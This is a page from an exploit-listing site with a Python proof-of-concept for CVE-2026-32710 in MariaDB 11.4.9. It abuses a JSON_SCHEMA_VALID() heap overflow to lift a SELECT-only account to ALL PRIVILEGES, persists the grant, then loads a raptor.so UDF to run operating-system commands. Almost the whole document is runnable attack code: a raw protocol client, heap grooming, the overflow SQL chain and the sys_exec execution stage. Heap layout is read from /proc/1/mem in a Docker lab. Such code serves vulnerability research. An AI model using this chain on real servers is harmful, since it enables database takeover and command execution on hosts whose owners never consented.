5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
CVE-2026-32710 — Heap OOB Write → Privilege Escalation → UDF RCE

Stage 1: Two-hop arbitrary write via JSON_SCHEMA_VALID() heap overflow.
         SELECT-only user → ALL PRIVILEGES WITH GRANT OPTION.
         Chain payload is pure SQL over TCP.

Stage 2: UDF code execution via DUMPFILE + CREATE FUNCTION.
         Writes pre-compiled .so to plugin_dir, executes arbitrary commands.

Target:  MariaDB 11.4.9 (Docker, ASLR disabled on host)

Lab-assisted: The script uses Docker/root introspection to read /proc/1/mem
and discover heap layout. The actual exploit chain is pure SQL over TCP.
A weaponized exploit would need an info-leak primitive to replace the
memory introspection step.

Usage:
    ./setup.sh                     # build and start the lab
    python3 exploit.py             # auto-calibrate and exploit
    python3 exploit.py --calibrate # measure constants only
    python3 exploit.py --cmd 'id > /tmp/pwned'  # custom command
"""
import argparse
import hashlib
import json
import socket
import struct
import subprocess
import sys
import time


# Default Docker container name; used as the default value of --container.
CONTAINER = "mariadb-cve-2026-32710"
# 40-character user-variable names set by groom(). The in-container scanner
# identifies entries whose name length is 40 and whose name is a single
# repeated character out of "a", "b", "c".
VAR_A = "a" * 40
VAR_B = "b" * 40
VAR_C = "c" * 40
# Number of filler user variables groom() sets before the three named ones.
EXHAUST_COUNT = 100
# Substituted into SCANNER_TEMPLATE's %d placeholder by scan_heap().
MA_STRUCT_OFFSET = 1712  # Security_context::master_access offset in struct


# =========================================================================== #
# Minimal MySQL/MariaDB protocol client (no external dependencies)            #
# =========================================================================== #

class MySQL:
    """COM_QUERY-only MySQL client over TCP.

    Implements just enough of the wire protocol to authenticate with a
    SHA1-scramble password token and to run text-protocol queries. Results
    are returned as plain lists of strings (see ``query``).
    """

    def __init__(self, host, port, user, password, db=None, timeout=30):
        """Connect to ``host:port`` and authenticate.

        Raises:
            OSError: the TCP connection could not be established or broke.
            Exception: the server answered the handshake with an ERR packet.
        """
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.sock.settimeout(timeout)
        try:
            self._auth(user, password, db)
        except BaseException:
            # Do not leak the socket when the handshake fails.
            self.sock.close()
            raise

    def _recv(self, n):
        """Read exactly ``n`` bytes or raise ConnectionError on EOF."""
        buf = bytearray()
        while len(buf) < n:
            c = self.sock.recv(n - len(buf))
            if not c:
                raise ConnectionError("server closed connection")
            buf += c
        return bytes(buf)

    def _rpkt(self):
        """Read one packet; return ``(sequence_id, payload)``."""
        h = self._recv(4)
        # Header: 3-byte little-endian payload length + 1-byte sequence id.
        plen = int.from_bytes(h[:3], "little")
        return h[3], self._recv(plen)

    def _wpkt(self, seq, data):
        """Send ``data`` as one packet with sequence id ``seq``."""
        self.sock.sendall(
            len(data).to_bytes(3, "little") + bytes([seq & 0xFF]) + data
        )

    def _auth(self, user, pw, db):
        """Parse the server greeting and send the handshake response.

        The token is SHA1(pw) XOR SHA1(salt + SHA1(SHA1(pw))); an empty
        password sends an empty token. Raises ``Exception`` if the server
        replies with an ERR packet.
        """
        _, g = self._rpkt()
        # Skip protocol byte + NUL-terminated version string + 4-byte id.
        nul = g.index(0, 1)
        p = nul + 5
        salt1 = g[p : p + 8]
        # Skip salt part 1 and its filler plus the fixed-size fields that
        # precede salt part 2.
        p += 9 + 2 + 1 + 2 + 2 + 1 + 10
        salt2 = g[p : p + 12]
        salt = salt1 + salt2

        if pw:
            h1 = hashlib.sha1(pw.encode()).digest()
            h2 = hashlib.sha1(h1).digest()
            h3 = hashlib.sha1(salt + h2).digest()
            token = bytes(a ^ b for a, b in zip(h1, h3))
        else:
            token = b""

        # NOTE(review): the base constant already has bit 0x08 set, so the
        # conditional OR does not change the value sent.
        caps = 0x000FA68D | (0x08 if db else 0)
        r = struct.pack("<II", caps, 1 << 24) + b"\x21" + b"\x00" * 23
        r += user.encode() + b"\x00" + bytes([len(token)]) + token
        if db:
            r += db.encode() + b"\x00"
        self._wpkt(1, r)
        _, reply = self._rpkt()
        if reply[0] == 0xFF:
            # Message text starts after marker, error code and SQL state.
            raise Exception(f"auth: {reply[9:].decode(errors='replace')}")

    def _lenenc(self, d, p):
        """Decode a length-encoded integer at ``d[p]``.

        Returns ``(value, next_position)``. The 0xFB (NULL) marker is
        handled by the caller before this is invoked.
        """
        b = d[p]
        if b < 0xFB:
            return b, p + 1
        if b == 0xFC:
            return int.from_bytes(d[p + 1 : p + 3], "little"), p + 3
        if b == 0xFD:
            return int.from_bytes(d[p + 1 : p + 4], "little"), p + 4
        return int.from_bytes(d[p + 1 : p + 9], "little"), p + 9

    def query(self, sql):
        """Run ``sql`` via COM_QUERY and return the result as strings.

        Returns:
            ``["OK"]`` for an OK packet, ``["ERR:<message>"]`` for an ERR
            packet, otherwise one string per row with columns joined by
            tabs and SQL NULL rendered as ``"NULL"``. An error arriving
            mid-result is appended as a final ``"ERR:..."`` entry.
        """
        self._wpkt(0, b"\x03" + sql.encode("utf-8"))
        _, pkt = self._rpkt()
        if pkt[0] == 0xFF:
            return [f"ERR:{pkt[9:].decode(errors='replace')}"]
        if pkt[0] == 0x00:
            return ["OK"]
        ncols = pkt[0] if pkt[0] < 0xFB else 0
        # Column definitions are read and discarded, then the EOF packet
        # that terminates them.
        for _ in range(ncols):
            self._rpkt()
        self._rpkt()
        rows = []
        while True:
            _, rp = self._rpkt()
            if rp[0] == 0xFE and len(rp) < 9:
                break
            if rp[0] == 0xFF:
                rows.append(f"ERR:{rp[9:].decode(errors='replace')}")
                break
            parts, pos = [], 0
            for _ in range(ncols):
                if rp[pos] == 0xFB:
                    parts.append("NULL")
                    pos += 1
                else:
                    sl, pos = self._lenenc(rp, pos)
                    parts.append(rp[pos : pos + sl].decode(errors="replace"))
                    pos += sl
            rows.append("\t".join(parts))
        return rows

    def alive(self):
        """Return True if ``SELECT 1`` round-trips, False otherwise."""
        try:
            r = self.query("SELECT 1")
            # bool() so an empty result yields False rather than [].
            return bool(r) and "1" in r[0]
        except Exception:
            return False

    def close(self):
        """Send COM_QUIT (best effort) and always close the socket."""
        try:
            self._wpkt(0, b"\x01")
        except Exception:
            # Deliberate best-effort: the peer may already be gone.
            pass
        finally:
            try:
                self.sock.close()
            except Exception:
                pass


# =========================================================================== #
# Heap introspection (lab-assisted — requires docker exec as root)            #
# =========================================================================== #

# Python source that scan_heap() runs inside the container via
# `docker exec ... python3 -c`. It contains a single %d placeholder (MA_OFF)
# that scan_heap() fills with MA_STRUCT_OFFSET.
# The script reads /proc/1/maps and /proc/1/mem and prints one JSON object:
#   {"entries": {<"a"|"b"|"c">: {"name", "addr", "value_ptr", "value_len"}},
#    "ma": [{"addr", "val", "base"}, ...]}
# Only anonymous "rw-p" mappings of at most 4 MiB are scanned.
SCANNER_TEMPLATE = r"""
import struct, json
mem = open("/proc/1/mem", "rb")
def rm(a, s):
    try:
        mem.seek(a); return mem.read(s)
    except: return None
ranges = []
with open("/proc/1/maps") as f:
    for l in f:
        if "rw-p" not in l: continue
        p = l.split(); a = p[0].split("-")
        s, e = int(a[0],16), int(a[1],16)
        if e-s > 4194304: continue
        if len(p) > 5 and p[5].strip(): continue
        ranges.append((s,e))
entries = {}
master_access = []
MA_OFF = %d
for s, e in ranges:
    d = rm(s, e-s)
    if not d: continue
    for off in range(0, len(d)-128, 8):
        nl = struct.unpack("<Q", d[off+24:off+32])[0]
        if nl != 40: continue
        ns = struct.unpack("<Q", d[off+16:off+24])[0]
        if not (0x7f0000000000 <= ns <= 0x7fffffffffff): continue
        nd = rm(ns, 41)
        if not nd: continue
        try: name = nd[:40].decode("ascii")
        except: continue
        ch = name[0]
        if ch not in "abc" or not all(c == ch for c in name): continue
        vp = struct.unpack("<Q", d[off+32:off+40])[0]
        vl = struct.unpack("<Q", d[off+40:off+48])[0]
        if not (0x7f0000000000 <= vp <= 0x7fffffffffff): continue
        if ch not in entries:
            entries[ch] = {"name": ch, "addr": s+off, "value_ptr": vp, "value_len": vl}
    off2 = 0
    while True:
        idx = d.find(b"lowpriv\x00", off2)
        if idx == -1: break
        sc = idx - 24
        if sc >= 0 and sc + MA_OFF + 8 <= len(d):
            u = struct.unpack("<Q", d[sc+8:sc+16])[0]
            if u and (0x7f0000000000 <= u <= 0x7fffffffffff):
                ud = rm(u, 8)
                if ud and ud[:7] == b"lowpriv":
                    ma = struct.unpack("<Q", d[sc+MA_OFF:sc+MA_OFF+8])[0]
                    master_access.append({"addr": s+sc+MA_OFF, "val": ma, "base": s+sc})
        off2 = idx + 1
mem.close()
print(json.dumps({"entries": entries, "ma": master_access}))
"""


def json_safe(b):
    """Return True if byte value ``b`` can sit unescaped in a JSON string.

    Rejected values are NUL, the double quote (0x22), the backslash (0x5C)
    and the control range 0x01-0x1F.
    """
    if b in (0x00, 0x22, 0x5C):
        return False
    return b < 0x01 or b > 0x1F


def scan_heap(container):
    """Scan mariadbd heap to find user_var_entry structs and master_access.

    Runs SCANNER_TEMPLATE (with MA_STRUCT_OFFSET substituted) inside
    ``container`` through ``docker exec`` and validates its JSON output.

    Returns:
        ``(info, None)`` on success, where ``info`` is a dict with keys
        ``lo``, ``hi``, ``ma_addr``, ``ma_val``, ``ea_addr``, ``ea_value``,
        ``ec_addr``, ``ec_value`` and ``sc_base``; ``(None, reason)`` on any
        failure, with ``reason`` a short string.

    NOTE(review): subprocess.TimeoutExpired from the 60 s timeout is not
    caught here and propagates to the caller.
    """
    r = subprocess.run(
        ["docker", "exec", container, "python3", "-c",
         SCANNER_TEMPLATE % MA_STRUCT_OFFSET],
        capture_output=True, text=True, timeout=60,
    )
    if r.returncode != 0:
        return None, r.stderr[:200]
    try:
        data = json.loads(r.stdout)
    except json.JSONDecodeError:
        return None, r.stdout[:200]

    ents = data.get("entries", {})
    # Only the "a" and "c" entries are required; "b" is not checked.
    if not all(k in ents for k in "ac"):
        return None, f"missing entries (found: {list(ents.keys())})"
    if not data["ma"]:
        return None, "no master_access found"

    ea = ents["a"]
    ec = ents["c"]
    # The first master_access candidate reported by the scanner is used.
    ma = data["ma"][0]

    # Two low-order bytes of (entry "a" address + 32).
    a32 = ea["addr"] + 32
    lo = a32 & 0xFF
    hi = (a32 >> 8) & 0xFF

    # Both bytes are later embedded in a JSON string, so each must pass
    # json_safe().
    if not json_safe(lo) or not json_safe(hi):
        return None, f"non-JSON-safe bytes (LO=0x{lo:02x} HI=0x{hi:02x})"

    # Everything above the low 16 bits must already match between the two
    # addresses.
    if (ec["value_ptr"] >> 16) != (a32 >> 16):
        return None, "entry_c->value and entry_a+32 in different 64KB pages"

    return {
        "lo": lo, "hi": hi,
        "ma_addr": ma["addr"], "ma_val": ma["val"],
        "ea_addr": ea["addr"], "ea_value": ea["value_ptr"],
        "ec_addr": ec["addr"], "ec_value": ec["value_ptr"],
        "sc_base": ma["base"],
    }, None


def read_memory(container, addr, size):
    """Read ``size`` raw bytes at ``addr`` from PID 1 inside ``container``.

    Returns the bytes, or None if the helper exits non-zero, its output
    contains "Error", or the output is not valid hex.
    """
    snippet = f"m=open('/proc/1/mem','rb');m.seek({addr});print(m.read({size}).hex());m.close()"
    proc = subprocess.run(
        ["docker", "exec", container, "python3", "-c", snippet],
        capture_output=True, text=True, timeout=10,
    )
    if proc.returncode != 0 or "Error" in proc.stdout:
        return None
    try:
        return bytes.fromhex(proc.stdout.strip())
    except ValueError:
        return None


# =========================================================================== #
# Stage 1: Privilege escalation (SQL chain over TCP)                          #
# =========================================================================== #

def groom(db):
    """Exhaust tcache and place sentinel variables for adjacent allocation.

    Args:
        db: connected MySQL client; every statement runs on this session.

    The statement order is significant and must not be rearranged.
    """
    # EXHAUST_COUNT filler variables, each holding 127 'X' characters.
    for i in range(EXHAUST_COUNT):
        db.query(f"SET @e{'x' * 38}{i:02d} = REPEAT('X', 127)")
    # The three named variables, set in a, b, c order with the same size.
    db.query(f"SET @{VAR_A} = REPEAT('X', 127)")
    db.query(f"SET @{VAR_B} = REPEAT('X', 127)")
    db.query(f"SET @{VAR_C} = REPEAT('X', 127)")
    # Variable "a" is then reassigned to a 500-character value.
    # NOTE(review): presumably to move its value buffer — confirm.
    db.query(f"SET @{VAR_A} = REPEAT('Z', 500)")


def build_chain_sql(lo, hi, ma_addr):
    """Build the single-statement two-hop chain SQL.

    Args:
        lo: low byte value emitted as ``CHAR(lo)`` in the first expression.
        hi: second byte value emitted as ``CHAR(hi)``.
        ma_addr: integer packed as 8 little-endian bytes at the start of
            the value assigned to the VAR_C variable.

    Returns:
        One ``SELECT`` statement string with three comma-separated
        expressions, evaluated by the server in the order written.
    """
    ma_bytes = struct.pack("<Q", ma_addr)

    overflow = (
        f"json_schema_valid('{{\"enum\":[0]}}', "
        f"CONCAT('\"', REPEAT(CHAR(0x41), 192), "
        f"CHAR({lo}), CHAR({hi}), '\"'))"
    )

    # One CHAR(n) term per byte of the packed address, followed by the
    # fixed fields annotated below.
    hop1_parts = [f"CHAR({b})" for b in ma_bytes]
    hop1_parts += [
        "CHAR(9)", "REPEAT(CHAR(0), 7)",       # length = 9
        "CHAR(3)", "REPEAT(CHAR(0), 7)",       # type = STRING_RESULT
        "CHAR(3)", "REPEAT(CHAR(0), 7)",       # decimals
        "REPEAT(CHAR(0), 64)",                 # padding
        "CHAR(0xA1)",                          # preserve next chunk size
        "REPEAT(CHAR(0), 29)",                 # remaining
    ]
    hop1 = f"CONCAT({', '.join(hop1_parts)})"
    hop2 = "REPEAT(CHAR(0xFF), 8)"

    return (
        f"SELECT {overflow}, "
        f"@{VAR_C} := {hop1}, "
        f"@{VAR_A} := {hop2}"
    )


def do_attempt(host, port, container, attempt_num):
    """Run one complete exploit attempt: connect → groom → scan → chain → persist.

    Args:
        host, port: address of the MariaDB server.
        container: Docker container name passed to scan_heap/read_memory.
        attempt_num: accepted but not used inside this function.

    Returns:
        NOTE(review): the return shape is not uniform.
        * bare ``True`` when mysql.global_priv is already readable;
        * ``(True, "PERSISTENT PRIVESC")`` after a successful run;
        * ``(None, reason)`` on every failure path.
        stage1() handles all three shapes.
    """
    # Up to 10 connection tries, one second apart. An auth failure raises a
    # plain Exception from MySQL._auth and is not caught here.
    for retry in range(10):
        try:
            db = MySQL(host, port, "lowpriv", "lowpriv", "test")
            break
        except (ConnectionError, ConnectionRefusedError, OSError):
            time.sleep(1)
    else:
        return None, "cannot connect after retries"

    # If this table is readable the account is already privileged.
    r = db.query("SELECT * FROM mysql.global_priv LIMIT 1")
    if r and not r[0].startswith("ERR"):
        print("    Already privileged — skipping to stage 2")
        db.close()
        return True

    # Groom
    groom(db)

    # Scan (inline, for THIS connection's heap)
    scan, err = scan_heap(container)
    if not scan:
        db.close()
        return None, err

    lo, hi = scan["lo"], scan["hi"]
    ma_addr = scan["ma_addr"]

    print(f"    entry_a+32:    0x{scan['ea_addr'] + 32:016x}  (LO=0x{lo:02x} HI=0x{hi:02x})")
    print(f"    master_access: 0x{ma_addr:016x}  = 0x{scan['ma_val']:x}")

    # Read master_access before chain
    ma_before = read_memory(container, ma_addr, 8)
    if ma_before:
        print(f"    BEFORE: master_access = 0x{int.from_bytes(ma_before, 'little'):x}")

    # Build and fire chain
    chain = build_chain_sql(lo, hi, ma_addr)
    try:
        r = db.query(chain)
    except ConnectionError:
        db.close()
        return None, "connection lost during chain"

    if not r or any(x.startswith("ERR") for x in r):
        db.close()
        return None, f"chain error: {r}"

    if not db.alive():
        db.close()
        return None, "server crashed after chain"
    print(f"    Server alive after chain")

    # Read master_access after chain
    # If the read itself fails (None) the value check is skipped entirely.
    ma_after = read_memory(container, ma_addr, 8)
    if ma_after:
        val = int.from_bytes(ma_after, "little")
        print(f"    AFTER:  master_access = 0x{val:x}")
        if val != 0xFFFFFFFFFFFFFFFF:
            db.close()
            return None, f"master_access not set (0x{val:x})"
        print(f"    *** master_access = ALL PRIVILEGES ***")

    # Verify
    r = db.query("SELECT LOAD_FILE('/etc/hostname')")
    hostname = r[0].strip() if r and r[0] != "NULL" and not r[0].startswith("ERR") else None
    print(f"    LOAD_FILE(/etc/hostname): {hostname or 'N/A'}")

    r = db.query("SHOW GRANTS FOR CURRENT_USER()")
    for row in r:
        print(f"    {row}")

    # This readability check is the one that decides success or failure.
    r = db.query(
        "SELECT user, host, JSON_EXTRACT(Priv, '$.access') "
        "FROM mysql.global_priv LIMIT 5"
    )
    if r and not r[0].startswith("ERR"):
        print("    mysql.global_priv readable:")
        for row in r:
            print(f"      {row}")
    else:
        db.close()
        return None, "cannot read mysql.global_priv"

    # Persist
    # The results of these two statements are not inspected.
    print("[*] Persisting escalation...")
    db.query("GRANT ALL PRIVILEGES ON *.* TO 'lowpriv'@'%' WITH GRANT OPTION")
    db.query("FLUSH PRIVILEGES")

    print("[*] Sleeping 10s for Aria checkpoint...")
    try:
        db.query("SELECT SLEEP(10)")
    except ConnectionError:
        pass
    db.close()
    return True, "PERSISTENT PRIVESC"


def stage1(host, port, container, max_attempts=5):
    """Call do_attempt() up to ``max_attempts`` times.

    Returns True as soon as an attempt reports success, False once all
    attempts have failed. Sleeps one second after each failed attempt.
    """
    print("[*] Stage 1: Privilege Escalation")
    for attempt_no in range(1, max_attempts + 1):
        print(f"\n  [Attempt {attempt_no}/{max_attempts}]")
        outcome = do_attempt(host, port, container, attempt_no - 1)

        # Bare True: nothing further to report.
        if outcome is True:
            return True

        if not isinstance(outcome, tuple):
            print(f"    Failed: {outcome}")
        else:
            succeeded, detail = outcome
            if succeeded:
                print(f"    {detail}")
                return True
            print(f"    Failed: {detail}")

        time.sleep(1)
    return False


# =========================================================================== #
# Stage 2: UDF RCE                                                           #
# =========================================================================== #

def stage2(host, port, container, command):
    """Write UDF .so → CREATE FUNCTION → execute command.

    Args:
        host, port, container: forwarded to ensure_server().
        command: string passed to ``sys_exec()``.

    Returns:
        True once the command statement has been sent, False if the server
        is unreachable, the grants check fails, or an install step errors.

    NOTE(review): ``command`` and the derived output path are interpolated
    into SQL string literals without escaping, so a value containing a
    single quote yields a malformed statement.
    """
    db = ensure_server(host, port, container, "Stage 2: UDF RCE")
    if not db:
        return False

    r = db.query("SHOW GRANTS FOR CURRENT_USER()")
    if not any("ALL PRIVILEGES" in row for row in r):
        print("    Privileges not persisted")
        db.close()
        return False
    print("    ALL PRIVILEGES confirmed")

    # Write UDF to plugin_dir
    # Source and destination paths are fixed; the source file must already
    # exist on the server side.
    print("[*] Installing UDF...")
    r = db.query(
        "SELECT LOAD_FILE('/tmp/raptor_udf.so') "
        "INTO DUMPFILE '/usr/lib/mysql/plugin/raptor.so'"
    )
    if r and r[0].startswith("ERR"):
        # An "already exists" error is treated as success.
        if "already exists" in r[0].lower():
            print("    raptor.so already in plugin_dir")
        else:
            print(f"    DUMPFILE: {r[0]}")
            db.close()
            return False
    else:
        print("    raptor.so written to plugin_dir")

    db.query("DROP FUNCTION IF EXISTS sys_exec")
    r = db.query("CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'raptor.so'")
    if r and r[0].startswith("ERR"):
        print(f"    CREATE FUNCTION: {r[0]}")
        db.close()
        return False
    print("    sys_exec() registered")

    # Execute
    # The return code is printed but does not affect this function's result.
    print(f"[*] Executing: {command}")
    r = db.query(f"SELECT sys_exec('{command}')")
    print(f"    Return code: {r[0] if r else '?'}")

    # When the command contains a redirect, the text after the last '>' is
    # taken as the output file and read back for display.
    if ">" in command:
        outfile = command.split(">")[-1].strip().rstrip("'\" ")
        r = db.query(f"SELECT LOAD_FILE('{outfile}')")
        if r and r[0] != "NULL" and not r[0].startswith("ERR"):
            print(f"    Output: {r[0].strip()}")

    db.close()
    return True


# =========================================================================== #
# Persistence verification                                                   #
# =========================================================================== #

def ensure_server(host, port, container, label=""):
    """Return a connected MySQL client, restarting the container on failure.

    Makes three connection tries. Each failed try is followed by a
    ``docker restart`` and a five-second pause; no further try is made
    after the last restart. Returns None when every try has failed.
    """
    if label:
        print(f"\n[*] {label}")

    for _ in range(3):
        conn = None
        try:
            conn = MySQL(host, port, "lowpriv", "lowpriv", "test", timeout=5)
        except Exception:
            # Any connection or auth failure leads to a restart below.
            conn = None
        if conn is not None:
            return conn

        print("    Server unreachable — restarting container...")
        restart_cmd = ["docker", "restart", container]
        subprocess.run(restart_cmd, capture_output=True, timeout=30)
        time.sleep(5)

    return None


def verify_persistence(host, port, container):
    """Report whether the current account's grants include ALL PRIVILEGES.

    Prints every grant row. When ALL PRIVILEGES is present, also prints the
    result of reading /etc/hostname through LOAD_FILE. Returns False if the
    server cannot be reached.
    """
    conn = ensure_server(host, port, container, "Persistence check...")
    if not conn:
        print("    Server unreachable after restart")
        return False

    has_all = False
    for grant in conn.query("SHOW GRANTS FOR CURRENT_USER()"):
        print(f"    {grant}")
        if "ALL PRIVILEGES" in grant:
            has_all = True

    if has_all:
        probe = conn.query("SELECT LOAD_FILE('/etc/hostname')")
        if probe and probe[0] != "NULL":
            print(f"    LOAD_FILE: {probe[0].strip()}")

    conn.close()
    return has_all


# =========================================================================== #
# Calibration mode                                                           #
# =========================================================================== #

def calibrate(host, port, container):
    """Groom one session, scan the heap once and print what was measured.

    Returns True when the scan succeeded and the values were printed,
    False when scan_heap() reported a failure.
    """
    print("[*] Calibrating...")
    session = MySQL(host, port, "lowpriv", "lowpriv", "test")
    groom(session)
    layout, failure = scan_heap(container)
    session.close()

    if not layout:
        print(f"    Failed: {failure}")
        return False

    a_plus_32 = layout["ea_addr"] + 32
    delta = layout["ea_value"] - layout["ma_addr"]
    print(f"\n    entry_a:        0x{layout['ea_addr']:016x}  value=0x{layout['ea_value']:016x}")
    print(f"    entry_a+32:     0x{a_plus_32:016x}  (LO=0x{layout['lo']:02x} HI=0x{layout['hi']:02x})")
    print(f"    entry_c:        0x{layout['ec_addr']:016x}  value=0x{layout['ec_value']:016x}")
    print(f"    master_access:  0x{layout['ma_addr']:016x}  = 0x{layout['ma_val']:x}")
    print(f"    SC base:        0x{layout['sc_base']:016x}")
    print(f"    OFFSET:         0x{delta:x} ({delta})")
    return True


# =========================================================================== #
# Main                                                                        #
# =========================================================================== #

def main():
    """Parse command-line options and run the requested mode.

    Exit status is 0 on success and 1 when calibration, stage 1 or stage 2
    reports failure.
    """
    ap = argparse.ArgumentParser(
        description="CVE-2026-32710: MariaDB JSON_SCHEMA_VALID() heap OOB → RCE"
    )
    ap.add_argument("--host", default="127.0.0.1")
    ap.add_argument("--port", type=int, default=3306)
    ap.add_argument("--container", default=CONTAINER)
    ap.add_argument("--calibrate", action="store_true",
                     help="Measure heap layout constants and exit")
    ap.add_argument("--cmd", default="id > /tmp/pwned",
                     help="Command to execute via sys_exec()")
    ap.add_argument("--attempts", type=int, default=5,
                     help="Max stage 1 attempts")
    ap.add_argument("--stage1-only", action="store_true",
                     help="Skip UDF RCE (stage 2)")
    args = ap.parse_args()

    print("=" * 70)
    print("CVE-2026-32710 — Heap OOB → Privilege Escalation → UDF RCE")
    print(f"  Target:  {args.host}:{args.port} (MariaDB 11.4.9)")
    print("  Impact:  lowpriv (SELECT only) → ALL PRIVILEGES → RCE")
    print("  Method:  Lab-assisted (uses /proc/1/mem for heap introspection)")
    print("=" * 70)

    if args.calibrate:
        # Propagate the calibration result instead of always exiting 0.
        calibrated = calibrate(args.host, args.port, args.container)
        sys.exit(0 if calibrated else 1)

    if not stage1(args.host, args.port, args.container, args.attempts):
        print("\n[!] Stage 1 FAILED")
        sys.exit(1)
    print("\n[+] Stage 1: PRIVILEGE ESCALATION SUCCESSFUL")

    if args.stage1_only:
        verify_persistence(args.host, args.port, args.container)
        sys.exit(0)

    if not stage2(args.host, args.port, args.container, args.cmd):
        print("\n[!] Stage 2 FAILED")
        verify_persistence(args.host, args.port, args.container)
        sys.exit(1)

    print("\n[+] Stage 2: COMMAND EXECUTED")
    # The hint names the default output file, so only show it when the
    # command actually refers to that file.
    if "/tmp/pwned" in args.cmd:
        print(f"    Verify: docker exec {args.container} cat /tmp/pwned")
    sys.exit(0)


if __name__ == "__main__":
    main()